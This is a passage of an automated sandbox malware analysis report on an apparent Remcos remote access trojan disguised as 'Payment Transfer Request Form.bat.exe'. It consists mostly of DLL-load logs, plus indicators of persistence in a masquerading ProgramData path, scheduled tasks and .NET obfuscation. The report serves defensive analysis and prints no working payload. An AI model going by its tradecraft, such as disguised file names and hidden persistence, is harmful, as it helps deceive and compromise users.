              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: winmm.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wininet.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: mswsock.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: winhttp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iphlpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: winnsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: dnsapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: rasadhlp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: fwpuclnt.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: version.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: uxtheme.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: dwrite.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: amsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: userenv.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: msasn1.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: gpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: windowscodecs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: propsys.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: edputil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: appresolver.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: bcp47langs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: slc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: sppc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: winmm.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: wininet.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: mscoree.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: version.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: uxtheme.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: dwrite.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: amsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: userenv.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: msasn1.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: gpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: windowscodecs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: propsys.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: edputil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: appresolver.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: bcp47langs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: slc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: sppc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: winmm.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: wininet.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: mscoree.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: version.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: uxtheme.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: dwrite.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: amsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: userenv.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: msasn1.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: gpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: windowscodecs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: propsys.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: edputil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: wintypes.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: appresolver.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: bcp47langs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: slc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: sppc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: winmm.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: wininet.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: Payment Transfer Request Form.bat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Payment Transfer Request Form.bat.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: Payment Transfer Request Form.bat.exe | Static file information: File size 1243656 > 1048576
              Source: Payment Transfer Request Form.bat.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x129a00
              Source: Payment Transfer Request Form.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: Payment Transfer Request Form.bat.exe, InnerForm.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: iKgKaogJ.exe.0.dr, InnerForm.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.cs | .Net Code: TRNtTFepRA System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.cs | .Net Code: TRNtTFepRA System.Reflection.Assembly.Load(byte[])
              Source: remcos.exe.9.dr, InnerForm.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 9_2_0041A8DA
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 0_2_02604698 push edx; ret | 0_2_0260469A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 0_2_0260469B push edx; ret | 0_2_0260469E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 0_2_0260469F push edx; ret | 0_2_026046A2
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 0_2_0260475B push ebp; ret | 0_2_02604762
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 0_2_02604791 push esi; ret | 0_2_02604792
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 0_2_0260DB84 pushfd ; ret | 0_2_0260DB89
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 0_2_06A942D9 push ebx; ret | 0_2_06A942DA
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 0_2_06A94E63 push es; ret | 0_2_06A94E64
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_004000D8 push es; iretd | 9_2_004000D9
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_0040008C push es; iretd | 9_2_0040008D
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_004542E6 push ecx; ret | 9_2_004542F9
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_0045B4FD push esi; ret | 9_2_0045B506
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_00432BD6 push ecx; ret | 9_2_00432BE9
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Code function: 9_2_00454C08 push eax; ret | 9_2_00454C26
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe | Code function: 11_2_016BDB84 pushfd ; ret | 11_2_016BDB89
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe | Code function: 11_2_075342D9 push ebx; ret | 11_2_075342DA
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 15_2_0141DB84 pushfd ; ret | 15_2_0141DB89
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_015ADB84 pushfd ; ret | 24_2_015ADB89
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C477B push edi; ret | 24_2_074C4783
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C272A push eax; ret | 24_2_074C272B
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C2620 push eax; ret | 24_2_074C2621
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C063E pushad ; ret | 24_2_074C063F
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C4694 push edx; ret | 24_2_074C4695
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C0575 push edx; ret | 24_2_074C0576
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C3509 push 48074B9Dh; ret | 24_2_074C3515
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C25DF push eax; ret | 24_2_074C25E0
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C8112 push esi; ret | 24_2_074C8114
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C81E4 push esi; ret | 24_2_074C81EB
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C3181 push edx; ret | 24_2_074C3182
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C7F66 push esi; ret | 24_2_074C7F6D
              Source: C:\ProgramData\AppUpdate\remcos.exe | Code function: 24_2_074C9F9D push edx; ret | 24_2_074C9F9E
              Source: Payment Transfer Request Form.bat.exe | Static PE information: section name: .text entropy: 7.664561171360738
              Source: iKgKaogJ.exe.0.dr | Static PE information: section name: .text entropy: 7.664561171360738
              Source: remcos.exe.9.dr | Static PE information: section name: .text entropy: 7.664561171360738
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, G8mARHMuZR8FXfnmCS.cs | High entropy of concatenated method names: 'UhjH7mra5i', 'XY6HjYPDkV', 'PF6HMPTPVB', 'PnIHUKZk3P', 'YjHH0melV6', 'WrkHKCle1o', 'sOSHSxE2Ay', 'mn8HPByR6u', 'mnIHwZgHT8', 'BaqHEZJEmm'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, QwhKlmmQbOGs1vhvh6.cs | High entropy of concatenated method names: 'CfliMWOhKg', 'w9UiUDG2tH', 'Ft2icQSo52', 'R2EiBvSMaI', 'JTLiDX0BLW', 'zu2iFCw2ph', 'cERiqd1hWw', 'UeLidOBibZ', 'IrdigGqCk0', 'kaciRRuIsY'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, T5nHuxt62bFgjEPISG.cs | High entropy of concatenated method names: 'IjXpNwhKlm', 'sbOpZGs1vh', 'Vbbp3WaNw9', 'dYxpI3UyMs', 'YYdpH3XJCT', 'hVupuxxaXb', 'WDhyjeDnKZqFw5Nxgb', 'UTyMZYiwrtO9F1etxh', 'VFJppwL6hq', 'JrcpA7tFVX'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, ytAJUOq4HRtVIxw1hb.cs | High entropy of concatenated method names: 'mHpCHhDhiK', 'eGAC9eOC0p', 'jXGCCsOrUl', 'SCLCL5Wpq2', 'GgZCnqdJY7', 'PV9ChNAlZb', 'Dispose', 'xEfsY6GYYd', 'LYYsiI6dlC', 'BYBsxtChcR'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.cs | High entropy of concatenated method names: 'QIpAWe27sg', 'FuPAYYEfId', 'kNuAi7ECAD', 'LkaAx9juvZ', 'fadAONuKQG', 'jIgA28xoeJ', 'B0qANBD0D2', 'erZAZEhILB', 'oEjAv56Sng', 'QV5A3btiPj'
